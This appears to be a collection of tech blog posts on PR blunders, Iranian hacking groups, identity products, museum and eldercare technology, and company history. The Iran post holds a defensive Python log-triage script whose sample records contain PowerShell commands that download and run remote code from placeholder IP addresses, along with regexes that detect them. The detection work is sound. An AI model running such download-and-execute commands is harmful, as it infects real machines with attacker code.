FIR B2B podcast #132: Worst PR Nightmares of 2019

This week we take a moment to reflect on the past year’s major PR blunders. Thanks to the folks at Crain’s Chicago Business, we have five doozies to relive with you. They run the gamut from Hallmark’s lesbian bridal spot to Sallie Mae’s Hawaiian junket to the various missteps of Boeing’s now ex-CEO. All have a few things in common:

  • The companies were culturally tone-deaf, whether to gender, racial, or other sensitive topics. Being woke isn’t just a fixed state of mind but a commitment to keep up with the cultural norms and mores and memes in this diverse world.
  • They failed to talk. The first hours after a crisis are critical and require a response — even if it is “We are working on a response and will get back to you.” Crickets will just inflame passions and create the impression that the business fails to understand its mistakes. “An organization is more likely to survive a crisis with its reputation intact if it immediately speaks for itself rather than allowing others to speculate about its motives and behavior,” Crain’s wrote.
  • They reinforced stereotypes. The Peloton ad would have worked if it had shown the woman giving her husband the bike, not the other way around. Why not run these ideas by impartial third parties who can identify the land mines? Hire a couple of journalists to poke holes in your message.
  • The companies waffled in response. Hallmark first pulled then reinstated its bridal TV spot. The ad was bold and progressive. Why not stand your ground instead of yielding to criticism that you know is coming?
  • Don’t be Facebook. We have beaten up repeatedly on the social network over the past year (#117 on alternatives and #102 on how to fix some of its most egregious flaws). Crain’s gives Facebook a dishonorable mention for stating that it won’t vet political campaign ads.

You can listen to our podcast here:

A field guide to Iran’s hacking groups

Iran has been in the news a lot lately, and there have been some excellent analyses of the various hacking groups sponsored by the Iranian state. Most of us know that Iran has hacked numerous businesses over the years, including numerous banks, the Bowman Avenue Dam in New York in 2013, the Las Vegas Sands casino company in 2014, various universities and government agencies, and even UNICEF. When you review all the data, you begin to see the extent of its activities. It is hard to keep all the group names distinct, what with names like Static Kitten, Charming Kitten, Clever Kitten and Flying Kitten. (This summary from Security Boulevard is a good place to start and has links to all the various felines.) Check Point has counted 35 different victims per week, and its latest analysis shows that 17% of them are American. Half of the overall targets are government agencies and financial companies.

To get a more detailed analysis of the various groups, Cyberint Research has published this 30-page document that describes the tactics, techniques and procedures used by ten such groups, matching them to the MITRE ATT&CK threat and group IDs. The group IDs are useful because different security researchers use different descriptive names (the Kitten ones come from CrowdStrike, for example).

What comes out of reading this document is pretty depressing, because the scale of Iran’s efforts is enormous. They are a very determined adversary, and they have taken aim at just about everyone over the past decade. Part of the problem is that there are many private hackers who are taking credit for some of the attacks, such as the recent defacement of the Federal Depository Library Program website, although “hacker culture in Iran is gradually being forced into submission by the regime through increasingly controlled infrastructure and internet laws, and recruitment to state-sponsored cyber warfare groups,” according to a report from IntSights.

A recent news report in the Jerusalem Post says that Iranian hacking is getting more sophisticated and broadening its targets. The story cites two former Israeli government cyber officials who claim Iran is now using Chinese hacking tools in its attacks, which is useful if Iran wants to muddy attribution. According to these sources, Israel sees more than 8 million cyber attacks a day.

To add insult to injury, other attackers are using the Iranian threat as a phishing lure, sending a message that pretends to come from Microsoft and asks you to log in with your credentials. (A word to the wise: don’t.)

US-CERT’s National Cyber Awareness System issued this alert last week. It recommends that you have your incident response plan in order, with the key roles delineated and rehearsed, so you can stem any potential losses. Lotem Finkelstein, head of Check Point’s cyber intelligence group, agrees: “You should ensure that MFA is enabled and you brush up your incident response plans.” Other suggestions from CERT include limiting PowerShell usage and logging its activity, keeping everything current on patches, and making sure your network monitoring is actually doing its job.
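Logging PowerShell activity is only half the job; someone has to read the logs. As an added example (my own code, not CERT’s or Check Point’s), here is a small Python triage pass over PowerShell script-block text of the kind that Windows event 4104 records once script block logging is turned on. The four sample records are constructed, the indicator regexes and the scoring threshold are my own assumptions rather than any published rule set, and the decoder handles the one trick that defeats naive grep: a payload hidden behind -EncodedCommand, which PowerShell expects as base64 over UTF-16LE.

```python
"""Triage PowerShell script-block log text for the indicators that usually
accompany an intrusion: encoded commands, download cradles, execution-policy
bypass and hidden windows.

Added example, not CERT's or Check Point's code.  The records below are
constructed to resemble the ScriptBlockText of Windows event 4104 (script
block logging); they are not real captured events.  Patterns, weights and the
threshold are assumptions to tune against your own baseline.
"""
import base64
import binascii
import re
from dataclasses import dataclass, field
from typing import List, Optional, Sequence, Tuple

# PowerShell accepts any unambiguous prefix of a parameter name, so an attacker
# can write -e, -ec, -enc or -EncodedCommand.  Capture the base64 argument.
ENCODED_COMMAND_RE = re.compile(
    r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

# Indicator name -> (pattern, weight).  Checked against the logged text and
# against the decoded payload of any -EncodedCommand found in it.
INDICATORS = {
    "download_cradle": (re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|Start-BitsTransfer",
        re.IGNORECASE), 3),
    "invoke_expression": (re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.IGNORECASE), 2),
    "policy_bypass": (re.compile(r"-e(?:p|x|xec|xecutionpolicy)\s+bypass", re.IGNORECASE), 2),
    "hidden_window": (re.compile(r"-w(?:in|indowstyle)?\s+hidden", re.IGNORECASE), 2),
    "no_profile": (re.compile(r"-nop(?:rofile)?\b", re.IGNORECASE), 1),
}
SUSPICIOUS_SCORE = 3  # assumed threshold


@dataclass
class Finding:
    record_id: int
    text: str
    decoded: Optional[str]              # -EncodedCommand payload, if present and valid
    indicators: List[str] = field(default_factory=list)
    score: int = 0


def decode_encoded_command(text: str) -> Optional[str]:
    """Return the UTF-16LE payload behind -EncodedCommand, or None."""
    m = ENCODED_COMMAND_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError):
        return None  # malformed payload; the record is still flagged below


def triage_record(record_id: int, text: str) -> Finding:
    finding = Finding(record_id, text, decode_encoded_command(text))
    if ENCODED_COMMAND_RE.search(text):
        finding.indicators.append("encoded_command")
        finding.score += 3
    haystack = text + "\n" + (finding.decoded or "")
    for name, (pattern, weight) in INDICATORS.items():
        if pattern.search(haystack):
            finding.indicators.append(name)
            finding.score += weight
    return finding


def triage(records: Sequence[Tuple[int, str]]) -> List[Finding]:
    return [triage_record(rid, text) for rid, text in records]


def suspicious(findings: Sequence[Finding]) -> List[Finding]:
    return [f for f in findings if f.score >= SUSPICIOUS_SCORE]


def _encode(command: str) -> str:
    """Build an -EncodedCommand argument the way powershell.exe expects it."""
    return base64.b64encode(command.encode("utf-16le")).decode("ascii")


# Constructed sample records: (record id, logged script block text).
SAMPLE_RECORDS = [
    (1, r"Get-ChildItem C:\Users\alice\Documents | Measure-Object"),
    (2, "powershell.exe -NoP -W Hidden -ExecutionPolicy Bypass -EncodedCommand "
        + _encode("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')")),
    (3, "Import-Module ActiveDirectory; Get-ADUser -Filter * -Properties LastLogonDate"),
    (4, r"Invoke-WebRequest -Uri http://203.0.113.9/p.exe -OutFile C:\Windows\Temp\p.exe; "
        r"Start-Process C:\Windows\Temp\p.exe"),
]

if __name__ == "__main__":
    for f in suspicious(triage(SAMPLE_RECORDS)):
        print(f"record {f.record_id}: score={f.score} indicators={f.indicators}")
        if f.decoded:
            print(f"  decoded: {f.decoded}")
```

Records 2 and 4 come out as suspicious; records 1 and 3 (ordinary admin work) do not. The point of the decode step is that record 2 matches four indicators only because the base64 blob was unwrapped first; a plain keyword search over the raw log line would see nothing but -EncodedCommand.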

Digital Shadows, a security consultancy, has plenty of other practical suggestions in this blog post for improving your infosec. They recommend keeping lines of communication open and helping your management understand the implications and risks involved. You should also have a plan for potential DDoS attacks and work through at least a tabletop exercise, if not a complete fire drill, to see where you are weakest.

Iran is a formidable foe. If they haven’t been on your radar before now, take a moment to review some of these documents and understand what you are up against.

Review of Thales’ SafeNet Trusted Access

Thales SafeNet Trusted Access (STA) offers a compelling blend of security functions that bridges the MFA, SSO and access management worlds in a single, well-integrated package. STA does this by offering policy-based access controls and SSO with very strong authentication features. The policies are flexible and powerful enough to address a broad range of access scenarios.

Because STA covers multiple security workflows, there are several places that it can fit into your overall data protection needs. Part of your own motivation for using this product will depend on the particular direction that you are coming from. What you need STA to do will depend on what you have already purchased and where your existing security tools are weakest.

If you presently use another SSO tool, or if you aren’t happy with your existing identity management product, you might examine whether it can integrate with STA so that STA becomes your principal identity provider. This gives you more scope for automation and moves you toward better MFA coverage for your consolidated logins.

If delivering MFA is your primary focus for purchasing a new identity product, STA should be on your short list of vendors. If you are rolling out MFA protection as part of a larger effort to secure your users and logins, then things get more interesting and the case for using STA becomes more compelling. For example, it can handle a variety of application authentication situations and is granular enough to deploy these methods for particular user collections and circumstances. Many older IAM products bolted on their MFA methods with cumbersome or quirky integrations, or required you to purchase separate add-on products for these features. STA has had this flexibility built in from the start and offers a well-integrated set of MFA options.

If you presently use another vendor’s authentication app, or have a collection of hardware tokens that you are trying to migrate away from, you might want to examine whether STA’s MobilePASS+ offers improvements to the user workflows that could increase MFA coverage across your application portfolio.

Thales SafeNet Trusted Access is available at this link. Pricing starts at $3.50 per user per month, which includes access management, SSO, authentication tokens and support services. A premium subscription that adds PKI-based MFA support is also available.

You can read my full report here. And here is my screencast video that points out the major product features:


Medium One-Zero: How to Totally Secure Your Smartphone

The more we use our smartphones, the more we open ourselves up to the possibility that the data stored on them will be hacked. The bad guys are getting better and better at finding ways into our phones through a combination of subtle malware and exploits. I review some of the more recent news stories about cell phone security, which should be enough to worry even the least paranoid among us. Then I describe the loss of privacy and how hackers can gain access to our accounts through these exploits. Finally, I provide a few practical suggestions on how you can be more vigilant and improve your infosec posture. You can read the article on Medium’s OneZero site.

How theme park technologies have helped museums: a case study of the new St. Louis Aquarium

I am a big patron of museums. I go to many of them and try to fit in a visit whenever I am out of town. What I have seen lately is that they have begun to use the same technologies that entertainment companies have been perfecting for movies and theme park rides, all in the interest of attracting more visitors and increasing engagement. I think this is a positive development, and this post explains its evolution and why it is welcome.

I have written about this trend before: once for the NY Times when I visited the Lincoln museum in Springfield Ill. back in 2008, and once for HPE’s blog posted two years ago. In those posts, I talk about how the best museum designers combine exhibits involving non-visual senses (not just reading some text plastered on the wall) and using technologies such as RFID and touchscreens to personalize the visit. (I’ll talk about these in a moment.)

You might call this the moment when museums become theme parks. While that isn’t quite as dire as it sounds, it does show how hard museums have to work to gain notice in this Snapchat world where attention can shift in a matter of seconds. It also shows how the technology developed for theme parks (including higher-definition video, complex theatrical control systems and the like) can be deployed to improve learning and make visits more memorable. These technologies can also help those of us who want to learn more and take a deeper dive into what the museum is showing.

I got a preview of the latest example with a new aquarium here in St. Louis that will open next week. The aquarium is part of a major redevelopment of our Union Station, a building that hasn’t seen any scheduled passenger service for many decades and is more than 100 years old. When I moved here more than ten years ago, the building contained a shop-worn mall that had lost its luster. Then a few years ago it began to be redeveloped by its current owner, Lodging Hospitality Management (LHM). That company continued its adaptive reuse with various entertainment improvements: besides the aquarium, there is a Ferris Wheel, new restaurants and an indoor ropes course.

But just saying we have a new aquarium isn’t really doing the place justice. It is probably the most technologically advanced aquarium that I have seen. Its use of technology is done so elegantly that you may not really notice it as you drag your brood through the place, looking at the tanks and the sea life. A preview of what you can see in its tanks is linked here. (There is also this story on a local TV station here.) Let’s stop in and see what is going on.

First is the use of the latest high-definition video in interesting ways. When you first enter the complex, you are in a soaring grand lobby that appears to sit at the bottom of a tank, as waves of water wash over you. The wall you are facing has loads of gears and a huge analog clock face, which plays on the fact that you are inside a former train station. You then realize that you are looking at various video screens, and some very nice ones at that: the screens deliver twice 4K resolution. That grabbed my attention. According to Andrew Schumacher, the main architectural designer at PGAV Destinations who led the project, they spec’ed out the lobby ceiling with projection video three years ago when they first began. “But then LED technology became a better solution, so we made that change.” It is certainly stunning.

PGAV Destinations is based in St. Louis and has been designing various attractions for more than 50 years. They have created exhibits for the Atlanta Aquarium, including building a new shark tank for them. They were excited about creating an entire aquarium from scratch, and were challenged by LHM to incorporate technology in interesting pedagogical ways that combined both “high tech and high touch,” according to Schumacher. I think they have succeeded quite well. When you think about their design challenge, they have to meet three different goals:

  • First, the animal or fish has to be comfortable in its habitat.
  • Second, the keepers have to be able to do their jobs, feed the critters, and maintain the tanks.
  • Finally, the guests have to have something interesting to see.

Balancing these three goals isn’t easy, and given that each animal is unique and that the aquarium has more than 13,000 different “residents,” that adds to the complexity. And the trick is making sure that in the future we still have all of these residents alive and well.

But it isn’t just having tech for tech’s sake. The designers wanted to “bring the visitor into the story, something we learned from Disney and other theme parks,” said Ben Davis, the CTO of MoonDog Animation Studio in Charleston SC. This means you have to craft a compelling story from the moment you purchase your ticket to when you inevitably exit through the gift shop. I think they have succeeded. MoonDog designed the stories that are used throughout the aquarium, something they have done for other cultural institutions. “We were trying to get the aquarium to talk back to you, to bring you an emotional experience and keep you in a state of awe,” he told me. I agree completely. This isn’t your grandfather’s fish tank.

Once we leave the lobby, we then move into what appears to be a mockup of a train car. Instead of the windows on the sides and ceiling of the car, you have additional video screens that take you on the start of your journey to the wonders of the rivers and oceans around you. Once you exit the train car, there are six different major galleries to explore that are defined by various ecosystems, including one that covers the nearby confluence of the Missouri and Mississippi Rivers.

Smart Monkeys’ ISAAC show control system runs the screens in this and other areas of the aquarium. You can see this company’s work operating media installations such as the Tom Bradley International Terminal at LAX (shown here) and at numerous museums around the world, including the Shedd Aquarium in Chicago, the US Mint in Philadelphia, and exhibits at the Kennedy Space Center. ISAAC makes it easy to coordinate and operate all the various digital media and to program some very sophisticated special effects.

The ISAAC system at the aquarium is running seven VMs and contains all the digital media assets for the place, along with housing a scheduling system and various databases and workspaces. The key, as explained to me by their director of technology Mitch Schuh, is to enable the graphic and exhibit designers to have tools to make it easier to realize their vision, without having to worry about the underlying networks, servers and other infrastructure. The system also has an active-active failover, in case one system goes down. All of this can be managed remotely via a web portal too, so the aquarium systems can be operated anywhere in the world. “I can think of several cases during the construction of the exhibits where we were able to make quick decisions and adjust show runtimes and make other changes on the fly,” said Schuh. “These would have taken a lot more time and effort without Isaac.”

Besides all the HD TVs, there are also touchscreen kiosks. They are popping up at many museums. The aquarium has them sprinkled throughout its galleries, and they are set in an attractive steampunk-like setup. Why steampunk? This is because the designers wanted to evoke what early 1900s-era train travel was like, paying homage to the early days of the station. These screens can provide a simulated 3D display of the sea life you are looking at, along with a map showing you where you are located and other data such as diet and habitat that can help amplify your visit and provide more context about what you are seeing in the tanks. They are also used to support a personalized game designed for kids visiting the museum. (More on that in a moment.)

Second is its use of music, sound and lighting effects. In my walkthrough I met Michael Gleason, the head composer, who told me that he had written more than 75 minutes of music that will play in different galleries and for different situations. That is more than many feature films have and is indicative of the sensory experience they are aiming for. But it isn’t just the sound effects; it is their combination with theatrical lighting too. I first saw this in the Lincoln museum, but the lighting is used in our aquarium in more clever ways to amplify the music you are hearing and what is swimming in the tanks in front of you. These digital assets are part of what the ISAAC show control system is managing.

Next is animation along with virtual and augmented reality. One of the exhibits houses the three resident otters, who of course are named Thatcher, Sawyer and Finn. There is also an animated otter called Tommy that you can interact with; it is manipulated via computers and was created by the folks at Groove Jones. Tommy is next to the gallery where you can see the real otters swimming around. A human operator has cameras to judge the audience response and answer their live questions; like the Wizard of Oz, the operator works the controls from a hidden booth. There is also a sandbar touch tank with a layer of video projected onto it, making it more enticing and interactive for visitors. The goal here is to engage visitors and have them literally get their hands wet exploring the life aquatic.

Personalization is also a big plus. When I visited the Chopin museum in Warsaw, we got an RFID tag that let us hear the content in our language of choice, with further personalization depending on our age and musical sophistication. Museums are getting smarter about making visits more personal. A good example can be found at Atlanta’s College Football Hall of Fame. When you purchase your ticket, you get a lanyard with an RFID chip that is set to a particular team and player. As you move around the museum, you see statistics filtered to be relevant to that player. At the aquarium, children get age-matched RFID cards that let them take part in a scavenger hunt and knowledge quizzes, with results posted to their profiles.

Sometimes the personalization doesn’t have to be high-tech: if you visit one of the Titanic museums in Branson or Las Vegas, you are given a random paper “passport” that lets you assume the identity of one of the passengers. You find out where that passenger lived aboard the ship and whether they survived the sinking.

We have come a long way since museums started using Acoustiguide technology to play recordings of their curators explaining the collections to us. MoonDog’s Davis sees a way to make this tech more location-sensitive, to further increase personalization, and to have it driven by ISAAC or another show-control system. He sees movie producers and museum curators converging, so that visitors can create their own stories during their visits.

There is a fine line between enriching a visit with sensory information and piling on so much that it overwhelms the visitor and defeats the purpose. You do want to leave time for visitors to think about what they are seeing, hearing and feeling. While I am excited to see these other, non-visual elements appear, I understand that you need to integrate them carefully and ensure that you aren’t building a theme park version of the museum. I welcome your own thoughts about this. Please share other examples of museums or places you have visited that have resonated with you in the comments.

How tech can help eldercare quality of life

If you are supporting an elderly member of your family, you might be interested in a collection of home tech devices that can help extend their ability to live independently. We all need help as we get older, and I write this column based on my family’s experience caring for my 95-year-old mother-in-law.

She has been living independently for the past 18 months using these three technologies:

  • Hero automated pill dispenser (It now costs at least $30 per month with a $100 initial purchase and 12-month commitment. There are other plans that cost more and provide additional monitoring and support.)
  • BlipCare BP blood pressure monitor (We bought it on Amazon for $159, although it currently is no longer being sold there.)
  • An Amazon Echo Show 5 ($89) or Echo Show 8 ($129). (These are list prices and are discounted heavily for various promotions.)

The three devices allow us to ensure we can reliably dispense her meds, take her blood pressure, and talk to her when we aren’t able to visit. I’ll explain the limitations and decisions behind each piece of technology. When we brought all this gear into the facility, the medical staff was impressed and also unfamiliar with each of them, which motivated my purpose in writing this column. Note that my mother-in-law lives independently in an eldercare facility, although step-up care is available in other parts of her building. This is a common arrangement.

Each device works with its own smartphone app for setup, but not for daily use: that is an important distinction, because my mother-in-law doesn’t have a smartphone. They also all require decent Wi-Fi service in her room, which could be an issue in some facilities. (This means you should test the signal strength in your family member’s room ahead of time.) All three units sit nestled together on her desk, which is also important, and I will get to why in a moment.

The Echo Show is a voice-activated home hub, similar to what Google and Apple sell, with one difference: it has a very simple video conferencing setup. The video screen (either five or eight inches on the diagonal) is critical, because it allows us to “drop in” on her, have a video chat and see what she is doing. This matters during the pill-taking and blood pressure routines, which is why all three devices are near each other on her desk, and it also lets us reach her when we can’t get her on her cell phone. It helps that the Echo Show is very simple to use, although you do need a smartphone app to place the call. A second benefit of Alexa devices is that they have a better event notification process, which is useful for verbal reminders of daily events. Other home hubs, such as those from Apple or Google, aren’t as convenient or as capable in this regard. (Facebook also has its Portal, but I haven’t tried it yet.) BTW, we have had mixed success with her giving Alexa voice commands. You might want to try one of these devices in your own home with your elderly family member and see how it goes.

The BlipCare device is a bit quirky to set up. It uses its own web server and has alarmingly lax security, but what is nice is that you don’t need anything else to record her blood pressure once you get it working. Results are automatically posted within a few minutes to a dashboard webpage that family members can check periodically and also share with doctors. If you have two family members to care for, it can track their stats separately.

Finally, the Hero device dispenses her pills. It needs to be loaded with them periodically, of course, but it is basically very simple to use: my mother-in-law just presses a button, and the pills drop into a cup, much as a soda machine dispenses its product. You set up a schedule of which pills get dispensed when.

The notion of having these three devices is to postpone having nursing care or other options for my mother-in-law. While these devices aren’t cheap, using them for several months can have a big payback given what the step-up nursing care charges would be. And they also offer a sense of security for our family. While for our situation the devices involve us in her care, your own family situation might not make this possible or desirable. And like any home tech, you have to be prepared to do some tech support to handle problems.

BTW, I use a different device to monitor my own blood pressure, the Qardio Arm ($99). It requires a Bluetooth connection to a smartphone to post its results and is somewhat difficult for an elderly person to put over their arm and align in just the right spot for accurate measurements. I have been using one for many years, and although I have had to replace two of the devices, the company quite willingly sent the replacements at no charge.

Feel free to share your own eldercare tech solutions here.

RSA blog: Why you need a chief trust officer

Lately it seems like trust is in short supply with tech-oriented businesses. It certainly doesn’t help that there have been a recent series of major breaches among security tech vendors. And the discussions about various social networks accepting political advertising haven’t exactly helped matters either. We could be witnessing a crisis of confidence in our industry, and CISOs may be forced to join the front lines of this fight.

One way to get ahead of the issue might be to anoint a Chief Trust Officer. The genesis of the title is the recognition that the role of the CISO is evolving. Corporations need a manager focused less on talking about technical threats and more on engendering trust in the business’ systems. The CTrO, as it is abbreviated, should assure stakeholders that the right set of tools and systems is in place.

This isn’t exactly a new idea: Tom Patterson (seen here) and Bob West were appointed to that position at Unisys and CipherCloud respectively more than five years ago, and Bill Burns has held the position at Informatica for more than three years. Burns was originally their CISO and was given the job to increase transparency and improve overall security and communications. Still, the title hasn’t exactly caught on: contemporary searches on job boards such as Glassdoor and Indeed find few open positions advertised. Perhaps a CTrO is more often an internal promotion than an outside hire. It is interesting that all the instances cited above are from the tech universe. Does that say we in IT are quicker to recognize the problem, or just that we have given it lip service?

Tom Patterson echoes a phrase that was often used by Ronald Reagan: “trust but verify.” It is a good maxim for any CTrO to keep in mind.

I spoke to Drummond Reed, who has been an actual CTrO at the security startup Evernym for three years now. “We chose that title very consciously because many companies already have Chief Security Officers, Chief Identity Officers and Chief Privacy Officers.” But at the core of all three titles is “to build and support trust. For a company like ours, which is in the business of helping businesses and individuals achieve trust through self-sovereign identity and verifiable digital credentials, it made sense to consolidate them all into a Chief Trust Officer.”

Speaking to my comment about paying lip service, Reed makes an important point: the title can’t be just an empty promise, but needs to carry some actual authority, and must be at a level that can rise above just another technology manager. The CTrO needs to understand the nature of the business and legal rules and policies that a company will follow to achieve trust with its customers, partners, employees, and other stakeholders. It is more about “elevating the importance of identity, security, and privacy within the context of an enterprise whose business really depends on trust,” advises Reed.

Trust is something that RSA’s President Rohit Ghai speaks about often. Corporations should “enable trust; not eradicate threats. Enable digital wellness; not eradicate digital illness.” I think this is also a good thing for CTrOs to keep in mind as they go about their daily work lives. Ghai talks about trust as the inverse of risk: “we can enhance trust by delivering value and reducing risk,” and by that he means not just managing new digital risks, but all kinds of risks.

In addition to hiring a CTrO, perhaps it is time we also focus more on enabling and promoting trust. For that I have a suggestion: let’s start treating digital trust as a non-renewable resource. Just like the energy conservationists promote moving to more renewable energy sources, we have to do the same with promoting better trust-maintaining technologies. These include better authentication, better red team defensive strategies, and better network governance. You have seen me write about these topics in other columns over the past couple of years, but perhaps they are more compelling in this context.

Lessons tech startups can learn from the history of 3Com

Many tech startups of today just assume that the Internet is ubiquitous, that bandwidth is plentiful, and that everyone can connect anywhere and at any time. Well, that wasn’t always the case, and back in the day when I was a young IT professional, we didn’t have the Internet. We didn’t have Wi-Fi. And we just barely had PCs on our desks.

Then a company by the name of 3Com came into the picture, and our world changed. Never heard of them? They were the early innovator of Ethernet computer networking, and back then you had to use wires to connect computers together and special circuit boards that had to be installed inside a computer, not to mention special software to run it all. Those early networks required real skill to set up properly. 3Com figured this all out, and the company existed for 40 years before its assets were eventually sold to HP for $2.7B a few years ago. They had a good run for the first ten years of their corporate life until they started making major mistakes in the mid-1990s.

If you are involved in a tech startup, there are lots of business books that you can read. But Jeff Chase’s 3Com chronicle will be one that can help guide you. He takes us through their founding, their success, their collapse, and their eventual end with a lot of insider information, which isn’t surprising given that he worked in their corporate audit department for nearly a decade. What is also important is how he describes the many lessons to be learned from this history of the company, how it took advantage of the early networking technologies and then squandered this lead.

First, let’s look at their major successes:

  1. A key recipe for any business’s success is whether or not teams have an emotional commitment towards their managers. 3Com had this in spades and was noted for its staff loyalty. One reason is that the company had a very open and transparent culture, sharing weekly results at all-hands meetings every Friday, including numbers that are generally known only to top executives. Contrast this with the many tech companies that are very secretive today.
  2. Understand your go-to-market and channel strategy. One 3Com CEO, Bill Krause, put it this way: “All our VCs thought that if you were going to sell networks it had to be done through their IT departments. We were determined to sell our products through computer stores because they were easy to install and use. That turned out to be successful.” That was an understatement. Back in those early days, this was ground-breaking.
  3. 3Com didn’t only develop and commercialize Ethernet products; it also developed new distribution methods and innovative manufacturing processes to make those products. It kept up – for a time – with advances in network speeds and contributed to the open standards that made Ethernet the only networking technology of its era to survive to the present day.
  4. They understood innovation, at least for their first decade. They had the patience to trust their instincts and initially placed the right bets to stay ahead on Ethernet innovation, with the caveats mentioned below. They also understood that they had sticky products that were put together well, and this drove loyalty in their existing customer base.
  5. 3Com was one of the first companies to go global in a meaningful way, hiring offshore R&D talent and focusing on partnerships with Chinese companies long before either of these became fashionable. They coined a term for the latter, “China Out,” which enabled them to enter the Chinese market, license their technology to a leading Chinese networking company, and re-energize the company in its later years. These chapters alone are worth reading for the story of how this happened.

But here are their major blunders:

  1. 3Com blew a major decision to upgrade to Fast Ethernet and gave that market away to Cisco. The two companies had big differences in their focus on sales, marketing and engineering. 3Com failed in the Fast Ethernet market, was late to recognize its role, and never recaptured the lead as an innovator that it had held with its early Ethernet products. Part of the problem was that they focused on their most profitable products, ignoring potentially game-changing disruptive new technologies. But part was that they rested on their laurels with their Ethernet business and stopped innovating, losing ground to others.
  2. They didn’t carefully plan their acquisitions. Early on, 3Com had a few successful acquisitions based on complementary strategies and product lines. But then in the mid-1990s they blew it with the US Robotics/Palm purchase. 3Com bought the modem company for $7.3B, eventually spinning off the Palm subsidiary in an IPO that generated $1B in cash profits. But 3Com was never the same after this acquisition, and it led to their eventual downfall.
  3. It lost its vision, misunderstanding its customers and what their priorities were. They became tactical, not strategic. They forgot about their customers, which were the major banks and largest enterprises in the world, and about what they purchased and how they bought their equipment. In essence, they exited the large enterprise market in 2000 and could only recapture it in later years with great difficulty.
  4. They had a strong CTO (Paul Sherer), but when he left, the position wasn’t filled. The book has a delightful story about how Sherer had to come in over a weekend after he resigned to help fix a bug that no one else could quash after weeks of work.

If you are working for a tech startup, spend some time learning from the successes and failures of 3Com. You will find them instructive, and Chase’s book a worthwhile read.

How the Red Cross provides social media leadership

I have been volunteering for the past several months for the American Red Cross, and I came across a series of documents, policies, and training about how they use social media that I thought I would share with you. I actually have two very different volunteer jobs with them. First, I work for our local chapter to drive blood to various hospital blood banks. And I work for the national office in DC to help produce a monthly webinar that is attended by hundreds of volunteers and employees involved in their disaster relief efforts. Note that these thoughts are my own, and not necessarily those of the Red Cross.

One thing that continually impresses me about the Red Cross is how well it partitions and structures the workflows of its volunteers. Even if you volunteer for a relatively low-level position, such as a front desk receptionist, there are manuals that guide what you do and when you do it. This isn’t surprising, given how many of us volunteers there are and how many volunteers are in key leadership roles directing its critical operations. Think about that for a moment: many non-profits give their volunteers the scut work (file these papers that have been lying around here for months). The Red Cross does the opposite, and it is often hard to distinguish between volunteers and staffers when you first meet someone.

A good case in point is my wife, who volunteered in their Santa Monica office years ago after the Katrina floods. Within weeks she was attending staff meetings and eventually she was hired as the chapter’s development director.

But let’s talk about social media. My first point concerns the Red Cross’ social media guidelines, which take up all of a single page but contain lots of good advice. I thought I would share some of them with you as an example of what you should create for your own business. During my last webinar, Megan Weiler, the senior director of Social Media at their DC HQ, gave a presentation on these guidelines and pointed out their six core principles of being a good social citizen:

  • Be human, meaning “be your friendly self and use good manners” – too often we tend to post from frustration or to try to right a wrong.
  • Be engaging, find others of similar interests and encourage thoughtful discussions.
  • Be accurate, make sure news items are verified and give credit for the content you got from someone or somewhere else.
  • Be honest, meaning if you mess up, fess up and do so quickly.
  • Be considerate, don’t start flame wars. If you have to disagree with someone, do it politely. Also, stay focused on the topic at hand.
  • Be safe. Protect your privacy and “be mindful of what you share online.”

These are all great things to keep in mind when you create your own social media posts for your company. What I like about this list is that it gives you both the responsibility and the boundaries to be successful at delivering messages using social media. Having written and spoken about these topics for more than a decade, I found it a very refreshing take. Too often corporations are heavy-handed about directing their employees’ use of social media. That heavy hand results in social media misfires or sock puppetry that doesn’t serve anyone well. (Take as a case in point the Twitter account of a certain former White House staffer earlier this month.)

Some corporations, like Dell, were early advocates of social media; Dell subsequently put together a central social media command center at its corporate offices outside of Austin. That may work well for them (I wrote this analysis of Dell’s effort back in 2011), and indeed the Red Cross has its own digital operations nerve center to help with its disaster relief efforts. But this is just one aspect of what the Red Cross does, and managing its gigantic global volunteer staff brings other circumstances and wider implications. They understand that social media engagement is a critical component of their operational DNA and that sharing a volunteer’s personal story is part of their mission.

You might wonder why I am driving blood around town. My reason was simple: it was an extension of the many years where I donated blood and I liked being more involved and getting to understand their infrastructure to bring blood units to those who need them. It isn’t intellectually challenging – other than keeping track of where in each hospital the blood labs are located – but it deepens my involvement. (Did you notice how I just shared my personal story here?) BTW, for those of you that donate blood, thanks for helping out!

Finally, the Red Cross has a half-hour online training course on social media basics that is only available to volunteers. The class walks you through what social listening is all about and how to get more engaged in participating in social media as a Red Crosser. The class also makes a distinction between a volunteer implying they are running an official Red Cross social media account and a volunteer saying that they represent only themselves. That is an important distinction.

The class goes into further details:

  • If you post anything about the Red Cross, make sure you disclose your role and use your real name. Disclose any vested self-interest and write about your own expertise.
  • Respect dignity, privacy and confidences. Be sensitive to the community you are serving, and be cautious about sharing information before it is vetted.
  • “Remember if you are online, you are on the record.” This is probably the most important aspect of social media, and one that many of us tend to forget.
  • Understand that your personal social media accounts are your identity. You should certainly include your corporate affiliation in your online bios, but you shouldn’t construct your Twitter handle around it. For example, create a handle such as @dstrom, rather than @redCrossStrom. Maintain the balance between what is personal and what is professional. Some companies want you to operate their social media accounts – while that could work in certain circumstances, the Red Cross wants you to be you.

How to prevent a data breach, lessons learned from the infosec vendors themselves

This fall there have been data breaches of the internal networks of several major security vendors. I had two initial thoughts when I first started hearing about these breaches. First, if the infosec vendors can’t keep their houses in order, how can ordinary individuals or non-tech companies stand a chance? And then I thought it would be useful to examine these breaches as powerful lessons in what the rest of us should avoid. You see, the actual mechanics of what happened during the average breach aren’t usually well documented. Even the most transparent businesses don’t really get down into the weeds in their breach notifications. I studied these breaches and have come away with some recommendations for your own infosec practices.

The breaches are:

You will notice a few common trends from these breaches. First, the delay in identifying the breach, and then in notifying customers. It took five weeks before NordVPN was notified by their datacenter provider, and they found out the attack was part of a wider attack on the provider’s other VPN vendor customers. “The datacenter deleted the user accounts that the intruder had exploited rather than notify us.” It took Avast months to identify their breach. Initially, IT staffers dismissed the unauthorized access as a false positive and ignored the logged entry. Months later it was re-examined and determined to be malicious. It took two months for Trend to track down exactly what happened before the employee was identified and then terminated.

